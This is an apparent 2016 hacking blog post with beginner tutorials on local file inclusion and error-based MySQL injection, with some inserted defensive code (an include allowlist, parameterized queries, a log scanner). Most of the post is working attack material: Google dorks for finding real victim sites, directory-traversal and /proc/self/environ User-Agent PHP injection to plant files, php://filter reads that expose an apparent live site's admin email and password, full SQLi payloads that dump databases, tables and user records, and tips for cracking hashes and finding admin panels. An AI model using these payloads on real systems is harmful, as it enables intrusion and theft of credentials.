Friday, April 15, 2016

Error based mapper and Union based mapper Chrome Extension

Error based : https://drive.google.com/open?id=0B9Iw4TQ-C_xCZmItbnpGRVpEaWc
Union based : https://drive.google.com/open?id=0B9Iw4TQ-C_xCQmtta2ZIZkd5MVE
Open source Chrome extension made by z3r07y-kn0w

Installation:
Step 1) Extract the RAR archive
Step 2) Go to chrome://extensions
Step 3) Check Developer mode
Step 4) Click Load unpacked extension
Step 5) Click Options on the extension

Using:
Well, I also don't know how to use it, but it's really easy to learn, so good luck!

LFI (Local File Inclusion) 100% noob [BASIC]

!! FOR EDUCATION PURPOSES ONLY !!

I Introduction
Hey guys, today I'm gonna teach you LFI (Local File Inclusion).

II Learning Basics
So first, we will learn some basics.

1) Google Dorks
What are Google dorks?
Google dorks are search operators like "inurl" and "intext" that make searching easier.

Why do we need that?
No, we don't need that. Just kidding, of course we need them to find target websites!

How do we use it?
So for example, go to Google and search: " inurl:index.php?page=news.php "
You'll see results like www.website.com/index.php?page=news.php

So what's next?

2) LFI
Local File Inclusion is the process of including files that are already locally present on the server, through the exploitation of vulnerable inclusion procedures implemented in the application.

IV Getting backdoor using LFI
So first, we will try to read /etc/passwd to see if it's vulnerable to directory traversal.
../ is used to go up one directory (the parent directory).

www.website.com/index.php?page=/etc/passwd
www.website.com/index.php?page=../etc/passwd
www.website.com/index.php?page=../../etc/passwd
www.website.com/index.php?page=../../../etc/passwd (Worked!)

Next, we will now try to include /proc/self/environ to execute PHP scripts.
www.website.com/index.php?page=../../../proc/self/environ (Worked!)

To check if it worked, you should see something like this:
DOCUMENT_ROOT=/home/www/public_htmlGATEWAY_INTERFACE=CGI/1.1HTTP_ACCEPT=text/html,application/xhtml xml,application/xml;q=0.9,*/*;q=0.8HTTP_ACCEPT_ENCODING=gzip, deflateHTTP_ACCEPT_LANGUAGE=en-US,en;q=0.5HTTP_CONNECTION=keep-aliveHTTP_HOST=localhostHTTP_USER_AGENT=Mozilla/5.0 (X11; Ubuntu; Linux i686; rv:27.0) Gecko/20100101 Firefox/27.0PATH=/bin:/usr/binPHPRC=/usr/local/lib/QUERY_STRING=page=../../../../proc/self/environREDIRECT_STATUS=200REMOTE_ADDR=182.68.251.152REMOTE_PORT=21007REQUEST_METHOD=GETREQUEST_URI=/?page=../../../../proc/self/environSCRIPT_FILENAME=/home/www/public_html/index.phpSCRIPT_NAME=/index.phpSERVER_ADDR=103.28.12.130SERVER_ADMIN= _NAME=localhostSERVER_PORT=80SERVER_PROTOCOL=HTTP/1.1SERVER_SIGNATURE=SERVER_SOFTWARE=ApacheUNIQUE_ID=U@e2lmccDCgAB3SNHk0AAAA

If you see something like 'HTTP_USER_AGENT=Mozilla', then you're good to go: the request's User-Agent header is written into that file, so PHP code placed in it will be executed when the page is requested.

a) If you're using Google Chrome then it's easier, because you don't need to download any extensions/add-ons:
Step 1) Press F12
Step 2) Click Toggle device mode
Step 3) Click Responsive
Step 4) Click Edit
Step 5) Add custom device...
Step 6) Add any device name; we will edit the User Agent later

b) If you're using Mozilla Firefox, download Live HTTP Headers or Tamper Data.

So change the User Agent to <?php phpinfo() ?>
Then, if you see the phpinfo() output, change the User Agent to:
<?$file = fopen("shhacked.php","w");fwrite($file,"<?phpinfo()?>");fclose($file);phpinfo();?>
And now check www.website.com/shhacked.php
There ya go. Well done.

V Read files using LFI
Ok, let's make this quick.
php://filter is a meta-wrapper designed to permit the application of filters to a stream at the time of opening. This is useful with all-in-one file functions such as readfile(), file(), and file_get_contents(), where there is otherwise no opportunity to apply a filter to the stream prior to the contents being read. We can use it to read PHP files such as configuration/database.php, which a plain include would execute instead of showing.
USAGE: php://filter/convert.base64-encode/resource=<file name here>
for example: https://icrpv5.org/index.php?page=php://filter/convert.base64-encode/resource=includes/process_login.php

You'll see a base64-encoded string. Decode it at http://shunz19.blogspot.com/2016/04/string-tools.html

So if you decode it, you'll see "if ($email == "admin@icrpv5.org" AND $password == '2015icrpvB4L1')". Easy: the email is admin@icrpv5.org and the password is 2015icrpvB4L1.
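As an added example (not from the original post), here is how the vulnerable index.php?page= include that sections IV and V exploit is fixed on the application side: a strict allowlist of page names plus a realpath containment check. It is written in Python (the target app is PHP; the same two checks apply there), and PAGES_DIR and the allowlist are assumed values for the demo.

```python
import os
import re

# Added example (not from the original post): a safe replacement for the
# "index.php?page=<file>" include pattern. Two layers: a strict page-name
# allowlist and a realpath containment check. PAGES_DIR and the allowlist
# are assumed values for this demo.

PAGES_DIR = "/var/www/app/pages"                          # assumed include directory
ALLOWED_PAGES = {"news.php", "about.php", "contact.php"}  # constructed allowlist

# A page name is one bare file name: letters, digits, "_" or "-", ending in .php.
# This alone excludes "../", "/etc/passwd" and any stream wrapper such as php://
_PAGE_NAME = re.compile(r"^[A-Za-z0-9_-]+\.php$")


def resolve_page(page_param: str, pages_dir: str = PAGES_DIR):
    """Map the untrusted ?page= value to an absolute path under pages_dir.

    Returns the resolved path, or None when the value is rejected. None is the
    safe default: traversal, absolute paths, php:// wrappers and unknown names
    never reach the filesystem.
    """
    if _PAGE_NAME.fullmatch(page_param) is None:
        return None
    if page_param not in ALLOWED_PAGES:
        return None
    # Defence in depth: even an allowlisted name must resolve inside pages_dir
    # (covers a symlinked pages_dir or a later loosening of the name rule).
    base = os.path.realpath(pages_dir)
    target = os.path.realpath(os.path.join(base, page_param))
    if os.path.commonpath([base, target]) != base:
        return None
    return target


def is_safe_page(page_param: str) -> bool:
    """True only if the value would actually be included."""
    return resolve_page(page_param) is not None


if __name__ == "__main__":
    # The values the LFI section tries, in order, plus one legitimate page
    for value in ("news.php", "/etc/passwd", "../../../etc/passwd",
                  "../../../proc/self/environ",
                  "php://filter/convert.base64-encode/resource=includes/process_login.php"):
        print(f"{value!r:80} -> {resolve_page(value)}")
```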

VI Tips
If you use /proc/self/environ and it doesn't load, the alternative is log poisoning.
In order to perform LFI log poisoning, you need to be able to include the Apache error or access logs. Unfortunately this has been made "impossible" in newer versions of Apache (the most used web server).

Some common log files:

/etc/httpd/logs/access_log
/etc/httpd/logs/access.log
/etc/httpd/logs/error_log
/etc/httpd/logs/error.log
/var/log/apache/error_log
/var/log/apache2/error_log
/var/log/apache/error.log
/var/log/apache2/error.log
/var/log/error_log
/var/log/error.log
/var/www/logs/error_log
/var/www/logs/error.log

VII Goodbye
If you have any feedback or questions, please feel free to comment! That's all for now, bye!


Error Based SQL Injection 100% Noob! [BASIC]

!! FOR EDUCATION PURPOSES ONLY !!

I Introduction
Hey guys.. Today I'm gonna teach you error based SQL injection!
What is the difference between union based and error based?
The differences between union and error based are:
1) Union is harder than error based, I think.
2) In union based you select all the columns and inject into the injectable column, while in error based you make an error that dumps the information.
3) You don't need to count the vulnerable columns in error based.


II Learning basics
So first, we will learn some basics.

1) Google Dorks
What are Google dorks?
Google dorks are search operators like "inurl" and "intext" that make searching easier.

Why do we need that?
No, we don't need that. Just kidding, of course we need them to find target websites!

How do we use it?
So for example, go to Google and search: " inurl:news.php?id= "
You'll see results like www.website.com/news.php?id=5

So what's next?

2) SQL
Structured Query Language (SQL) is a special-purpose programming language designed for managing data held in a relational database management system.
Reference? Of course, Wikipedia.

3) SQL Injection
SQL injection is a kind of attack in which malicious code is inserted into SQL statements to drop, update, add to, view, etc. a database.

So after learning some basics, we will now proceed to another basic: basic SQL injection, 100% for the noob learner.

III Gathering
So after learning some basics, we will now gather some information.

Part 1 : Finding target website
To find a target website, we need to use Google dorks.
Let's google: " inurl:page.php?id= "

You can make your own dork if you want; here are some examples:

inurl:page.php?id=19
inurl:gallery.php?id=19
inurl:view.php?id=19
inurl:article.php?id=19

inurl:buy.php?id=19

So get a target and let's start.

Part 2 : Checking if vulnerable
After getting a target website, we will now check if it's vulnerable to SQL injection or not.
For example, this is my target: leettime.net/sqlninja.com/tasks/basic_ch1.php?id=1

You'll add a single quote " ' " to the end of the number:
leettime.net/sqlninja.com/tasks/basic_ch1.php?id=1'

If you see something like this:
  You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ''1''' at line 1

If it doesn't load normally but shows an error that doesn't look like that, I suggest checking my article about union based SQL injection.

If it loads normally, then you should get another target.
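As an added example (not from the original post), here is the bug behind the quote probe in Part 2 next to its fix, in Python with sqlite3 standing in for MySQL; the news table, its rows and the endpoint functions are constructed for the demo.

```python
import sqlite3

# Added example (not from the original post): why the "add a quote" probe in
# Part 2 works, and what the fixed endpoint looks like. The schema and rows are
# constructed; sqlite3 stands in for MySQL, the concatenation bug is identical.


def make_db() -> sqlite3.Connection:
    """In-memory stand-in for the target's database."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE news (id INTEGER PRIMARY KEY, title TEXT)")
    conn.executemany("INSERT INTO news VALUES (?, ?)",
                     [(1, "first post"), (2, "second post")])
    return conn


def fetch_vulnerable(conn, user_id: str) -> list:
    """The pattern the tutorial targets: the parameter is pasted into SQL text.
    id=1' leaves an unterminated quote (syntax error); id=1'-- closes the quote
    and comments out the rest, so the page "loads normally" as Part 3 describes."""
    query = "SELECT title FROM news WHERE id = '" + user_id + "'"
    return [row[0] for row in conn.execute(query)]


def fetch_safe(conn, user_id: str) -> list:
    """Parameterised version: the value is bound as data and never parsed as SQL,
    so a quote or comment inside it is just characters that match no row."""
    rows = conn.execute("SELECT title FROM news WHERE id = ?", (user_id,))
    return [row[0] for row in rows]


def vulnerable_endpoint(conn, user_id: str) -> dict:
    """Echoes the raw driver error: the oracle that error-based injection relies on."""
    try:
        return {"status": 200, "body": fetch_vulnerable(conn, user_id), "log": None}
    except sqlite3.Error as exc:
        return {"status": 200, "body": str(exc), "log": None}


def safe_endpoint(conn, user_id: str) -> dict:
    """Parameterised query plus a generic error body; detail goes to a server log."""
    try:
        return {"status": 200, "body": fetch_safe(conn, user_id), "log": None}
    except sqlite3.Error as exc:          # not reachable through the bound parameter
        return {"status": 500, "body": "Internal error", "log": repr(exc)}
```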

Part 3 : Getting right comment
So after we learned how to check if it's vulnerable to error based, we will now find the right comment. Try adding " '--+ " after the ID number.
The URL will now be:

leettime.net/sqlninja.com/tasks/basic_ch1.php?id=1'_PAYLOAD_--+

If the page loads normally, then the id is a string and the comment is '--+. But if the page loads with an error, then the id is an integer and the comment is just --:
leettime.net/sqlninja.com/tasks/basic_ch1.php?id=1_PAYLOAD--

In my target, the right comment is '--+

Part 4 : Checking version
So let's verify that it's really vulnerable to error based by getting the version.
Simply add +OR+1+GROUP+BY+CONCAT_WS(0x3a,VERSION(),FLOOR(RAND(0)*2))+HAVING+MIN(0)+OR+1 to the payload:

http://leettime.net/sqlninja.com/tasks/basic_ch1.php?id=1'+OR+1+GROUP+BY+CONCAT_WS(0x3a,VERSION(),FLOOR(RAND(0)*2))+HAVING+MIN(0)+OR+1--+

There we go, we got the version:

Duplicate entry '5.5.48-cll:1' for key 'group_key'

The version of MySQL is 5.5.48-cll.

Part 5 : Getting databases
After getting the version, we will now get the database name. This is our payload: +OR+1+GROUP+BY+CONCAT_WS(0x3a,DATABASE(),FLOOR(RAND(0)*2))+HAVING+MIN(0)+OR+1

http://leettime.net/sqlninja.com/tasks/basic_ch1.php?id=1'+OR+1+GROUP+BY+CONCAT_WS(0x3a,DATABASE(),FLOOR(RAND(0)*2))+HAVING+MIN(0)+OR+1--+

And there we go! We got the database name. If you want to check for other databases, then use this payload: +AND+(SELECT+1+FROM+(SELECT+COUNT(*),CONCAT((SELECT(SELECT+CONCAT(CAST(CONCAT(schema_name)+AS+CHAR),0x7e))+FROM+information_schema.schemata+LIMIT+0,1),FLOOR(RAND(0)*2))x+FROM+INFORMATION_SCHEMA.TABLES+GROUP+BY+x)a)

So the link will be:

leettime.net/sqlninja.com/tasks/basic_ch1.php?id=1'+AND+(SELECT+1+FROM+(SELECT+COUNT(*),CONCAT((SELECT(SELECT+CONCAT(CAST(CONCAT(schema_name)+AS+CHAR),0x7e))+FROM+information_schema.schemata+LIMIT+0,1),FLOOR(RAND(0)*2))x+FROM+INFORMATION_SCHEMA.TABLES+GROUP+BY+x)a)--+

Duplicate entry 'information_schema~1' for key 'group_key'

So the first database is information_schema.
Now increase the LIMIT in the payload by 1 to check the next database name:

leettime.net/sqlninja.com/tasks/basic_ch1.php?id=1'+AND+(SELECT+1+FROM+(SELECT+COUNT(*),CONCAT((SELECT(SELECT+CONCAT(CAST(CONCAT(schema_name)+AS+CHAR),0x7e))+FROM+information_schema.schemata+LIMIT+1,1),FLOOR(RAND(0)*2))x+FROM+INFORMATION_SCHEMA.TABLES+GROUP+BY+x)a)--+

Duplicate entry 'leettime_761wHole~1' for key 'group_key'

The second database name is leettime_761wHole. Then let's check the third database:

http://leettime.net/sqlninja.com/tasks/basic_ch1.php?id=1'+AND+(SELECT+1+FROM+(SELECT+COUNT(*),CONCAT((SELECT(SELECT+CONCAT(CAST(CONCAT(schema_name)+AS+CHAR),0x7e))+FROM+information_schema.schemata+LIMIT+2,1),FLOOR(RAND(0)*2))x+FROM+INFORMATION_SCHEMA.TABLES+GROUP+BY+x)a)--+

If the page loads normally, then the third database doesn't exist.

Part 6 : Getting tables
After getting the database names, we will now try to get the tables of that database.
The database name in my target is leettime_761wHole

Go to http://shunz19.blogspot.com/2016/04/string-tools.html and convert the database name to hex.

leettime_761wHole in hex is "6c65657474696d655f37363177486f6c65"
Then add 0x at the start, so "0x6c65657474696d655f37363177486f6c65"

Our payload to get the tables is +AND(SELECT+1+FROM+(SELECT+COUNT(*),CONCAT((SELECT(SELECT+CONCAT(CAST(table_name+AS+CHAR),0x7e))+FROM+INFORMATION_SCHEMA.TABLES+WHERE+table_schema=_HEXDATABASE_+LIMIT+0,1),FLOOR(RAND(0)*2))x+FROM+INFORMATION_SCHEMA.TABLES+GROUP+BY+x)a)

So our link will be:

leettime.net/sqlninja.com/tasks/basic_ch1.php?id=1'+AND(SELECT+1+FROM+(SELECT+COUNT(*),CONCAT((SELECT(SELECT+CONCAT(CAST(table_name+AS+CHAR),0x7e))+FROM+INFORMATION_SCHEMA.TABLES+WHERE+table_schema=0x6c65657474696d655f37363177486f6c65+LIMIT+0,1),FLOOR(RAND(0)*2))x+FROM+INFORMATION_SCHEMA.TABLES+GROUP+BY+x)a)--+

Duplicate entry 'testtable1~1' for key 'group_key'

The first table is: testtable1
Let's check for another table by increasing the limit by 1:

leettime.net/sqlninja.com/tasks/basic_ch1.php?id=1'+AND(SELECT+1+FROM+(SELECT+COUNT(*),CONCAT((SELECT(SELECT+CONCAT(CAST(table_name+AS+CHAR),0x7e))+FROM+INFORMATION_SCHEMA.TABLES+WHERE+table_schema=0x6c65657474696d655f37363177486f6c65+LIMIT+1,1),FLOOR(RAND(0)*2))x+FROM+INFORMATION_SCHEMA.TABLES+GROUP+BY+x)a)--+

Duplicate entry 'userlogs~1' for key 'group_key'

leettime.net/sqlninja.com/tasks/basic_ch1.php?id=1'+AND(SELECT+1+FROM+(SELECT+COUNT(*),CONCAT((SELECT(SELECT+CONCAT(CAST(table_name+AS+CHAR),0x7e))+FROM+INFORMATION_SCHEMA.TABLES+WHERE+table_schema=0x6c65657474696d655f37363177486f6c65+LIMIT+2,1),FLOOR(RAND(0)*2))x+FROM+INFORMATION_SCHEMA.TABLES+GROUP+BY+x)a)--+

Duplicate entry 'users~1' for key 'group_key'

Keep increasing the limit number to get the remaining tables.

Part 7 : Getting columns
So after getting the tables and databases, we will now get the columns.

Our payload to get the columns is : +AND+(SELECT+1+FROM+(SELECT+COUNT(*),CONCAT((SELECT(SELECT+CONCAT(CAST(column_name+AS+CHAR),0x7e))+FROM+INFORMATION_SCHEMA.COLUMNS+WHERE+table_name=_HEXTABLE_+AND+table_schema=_HEXDATABASE_+LIMIT+0,1),FLOOR(RAND(0)*2))x+FROM+INFORMATION_SCHEMA.TABLES+GROUP+BY+x)a)

So the hex of users is "7573657273"
and leettime_761wHole in hex is "6c65657474696d655f37363177486f6c65"
Add 0x as well.

The URL will be:

leettime.net/sqlninja.com/tasks/basic_ch1.php?id=1'+AND+(SELECT+1+FROM+(SELECT+COUNT(*),CONCAT((SELECT(SELECT+CONCAT(CAST(column_name+AS+CHAR),0x7e))+FROM+INFORMATION_SCHEMA.COLUMNS+WHERE+table_name=0x7573657273+AND+table_schema=0x6c65657474696d655f37363177486f6c65+LIMIT+0,1),FLOOR(RAND(0)*2))x+FROM+INFORMATION_SCHEMA.TABLES+GROUP+BY+x)a)--+

Duplicate entry 'id~1' for key 'group_key'

The first column is id. Again, increase the limit to get the next column:

leettime.net/sqlninja.com/tasks/basic_ch1.php?id=1'+AND+(SELECT+1+FROM+(SELECT+COUNT(*),CONCAT((SELECT(SELECT+CONCAT(CAST(column_name+AS+CHAR),0x7e))+FROM+INFORMATION_SCHEMA.COLUMNS+WHERE+table_name=0x7573657273+AND+table_schema=0x6c65657474696d655f37363177486f6c65+LIMIT+1,1),FLOOR(RAND(0)*2))x+FROM+INFORMATION_SCHEMA.TABLES+GROUP+BY+x)a)--+

Duplicate entry 'username~1' for key 'group_key'

leettime.net/sqlninja.com/tasks/basic_ch1.php?id=1'+AND+(SELECT+1+FROM+(SELECT+COUNT(*),CONCAT((SELECT(SELECT+CONCAT(CAST(column_name+AS+CHAR),0x7e))+FROM+INFORMATION_SCHEMA.COLUMNS+WHERE+table_name=0x7573657273+AND+table_schema=0x6c65657474696d655f37363177486f6c65+LIMIT+2,1),FLOOR(RAND(0)*2))x+FROM+INFORMATION_SCHEMA.TABLES+GROUP+BY+x)a)--+

Duplicate entry 'password~1' for key 'group_key'

And again and again...

Part 8 : Dumping data
After we got the database, table and columns, now it's time to dump the data! YAY!

Our payload to dump the data is +AND+(SELECT+1+FROM+(SELECT+COUNT(*),CONCAT((SELECT(SELECT+CONCAT(CAST(CONCAT(_COLUMN_)+AS+CHAR),0x7e))+FROM+_DATABASE_._TABLE_+LIMIT+0,1),FLOOR(RAND(0)*2))x+FROM+INFORMATION_SCHEMA.TABLES+GROUP+BY+x)a)

* NOTE: YOU CANNOT GET MULTIPLE COLUMNS, LIKE username,0x3a,password. IT WILL NOT WORK *

So the URL will be:

leettime.net/sqlninja.com/tasks/basic_ch1.php?id=1'+AND+(SELECT+1+FROM+(SELECT+COUNT(*),CONCAT((SELECT(SELECT+CONCAT(CAST(CONCAT(username)+AS+CHAR),0x7e))+FROM+leettime_761wHole.users+LIMIT+0,1),FLOOR(RAND(0)*2))x+FROM+INFORMATION_SCHEMA.TABLES+GROUP+BY+x)a)--+

Duplicate entry 'admin~1' for key 'group_key'

Again, increase the limit by 1:

leettime.net/sqlninja.com/tasks/basic_ch1.php?id=1'+AND+(SELECT+1+FROM+(SELECT+COUNT(*),CONCAT((SELECT(SELECT+CONCAT(CAST(CONCAT(username)+AS+CHAR),0x7e))+FROM+leettime_761wHole.users+LIMIT+1,1),FLOOR(RAND(0)*2))x+FROM+INFORMATION_SCHEMA.TABLES+GROUP+BY+x)a)--+

Duplicate entry 'decompiler~1' for key 'group_key'

leettime.net/sqlninja.com/tasks/basic_ch1.php?id=1'+AND+(SELECT+1+FROM+(SELECT+COUNT(*),CONCAT((SELECT(SELECT+CONCAT(CAST(CONCAT(username)+AS+CHAR),0x7e))+FROM+leettime_761wHole.users+LIMIT+2,1),FLOOR(RAND(0)*2))x+FROM+INFORMATION_SCHEMA.TABLES+GROUP+BY+x)a)--+

Duplicate entry 'devilhunte~1' for key 'group_key'

And keep increasing the limit.
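As an added example (not from the original post), here are detection rules for the request patterns in both the LFI walkthrough above (traversal, /proc/self/environ, php://filter) and this error-based SQL injection walkthrough (the FLOOR(RAND(0)*2) trick, information_schema enumeration, the quote-plus-comment probe), run over constructed access log lines; the rule names, hosts and log lines are all made up for the demo.

```python
import re
from urllib.parse import unquote_plus

# Added example (not from the original post): signature rules for the request
# patterns shown in the LFI and error-based SQLi walkthroughs, run over
# constructed Apache-style access log lines. Rules, hosts and lines are ours.
RULES = {
    "lfi-traversal": re.compile(r"(\.\./){2,}|/etc/passwd|/proc/self/environ", re.I),
    "lfi-php-wrapper": re.compile(r"php://(filter|input|data)", re.I),
    # the FLOOR(RAND(0)*2) duplicate-key trick every error-based payload above uses
    "sqli-error-based": re.compile(r"FLOOR\(\s*RAND\(0\)\s*\*\s*2\s*\)", re.I),
    # schema enumeration through information_schema (parts 5 to 7)
    "sqli-schema-enum": re.compile(r"information_schema\.(schemata|tables|columns)", re.I),
    # the "right comment" probe from part 3: a quote directly followed by a comment
    "sqli-quote-comment": re.compile(r"'(--|#)"),
}

# Common log format; only the fields we need are captured
LOG_LINE = re.compile(r'^(?P<ip>\S+) \S+ \S+ \[[^\]]+\] "(?P<method>\S+) (?P<path>\S+) [^"]*" (?P<status>\d{3})')


def classify_request(path: str) -> list:
    """Decode once (payloads use + for space and %xx escapes), then return the
    names of every rule the decoded path matches, in RULES order."""
    decoded = unquote_plus(path)
    return [name for name, rx in RULES.items() if rx.search(decoded)]


def scan_log(lines) -> list:
    """Return (ip, path, [rule names]) for each parsable line that trips a rule."""
    hits = []
    for line in lines:
        m = LOG_LINE.match(line)
        if m is None:
            continue
        tags = classify_request(m["path"])
        if tags:
            hits.append((m["ip"], m["path"], tags))
    return hits


# Constructed lines; 203.0.113.0/24 is a documentation range, not a real host
SAMPLE_LOG = [
    '203.0.113.7 - - [15/Apr/2016:10:00:01 +0000] "GET /index.php?page=news.php HTTP/1.1" 200 512',
    '203.0.113.7 - - [15/Apr/2016:10:00:05 +0000] "GET /index.php?page=../../../etc/passwd HTTP/1.1" 200 1830',
    '203.0.113.7 - - [15/Apr/2016:10:00:14 +0000] "GET /index.php?page=php://filter/convert.base64-encode/resource=includes/process_login.php HTTP/1.1" 200 980',
    '203.0.113.9 - - [15/Apr/2016:11:30:02 +0000] "GET /tasks/basic_ch1.php?id=1\'--+ HTTP/1.1" 200 640',
    '203.0.113.9 - - [15/Apr/2016:11:31:02 +0000] "GET /tasks/basic_ch1.php?id=1\'+AND+(SELECT+1+FROM+(SELECT+COUNT(*),CONCAT((SELECT(SELECT+CONCAT(CAST(CONCAT(schema_name)+AS+CHAR),0x7e))+FROM+information_schema.schemata+LIMIT+0,1),FLOOR(RAND(0)*2))x+FROM+INFORMATION_SCHEMA.TABLES+GROUP+BY+x)a)--+ HTTP/1.1" 200 310',
]
```

Match on the decoded path, as the code does; otherwise the + and %xx encodings in the tutorial's URLs slip past the rules.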

IV Getting login panel
So what's the point of getting the login credentials if you're not gonna use them to log in?
Some passwords are hashed, like MD5, SHA1, etc. You can look up (crack) those MD5 and other hashes on md5online.com, crackstation.net, ...

There are many tools to find the login panel, but the common panels are:
www.website.com/admin
www.website.com/administrator
www.website.com/admin.php
www.website.com/administrator.php
www.website.com/login.php
www.website.com/cms

V Goodbye
Thank you for reading this tutorial, I hope you learned something! If you have any questions or feedback, please don't hesitate to comment!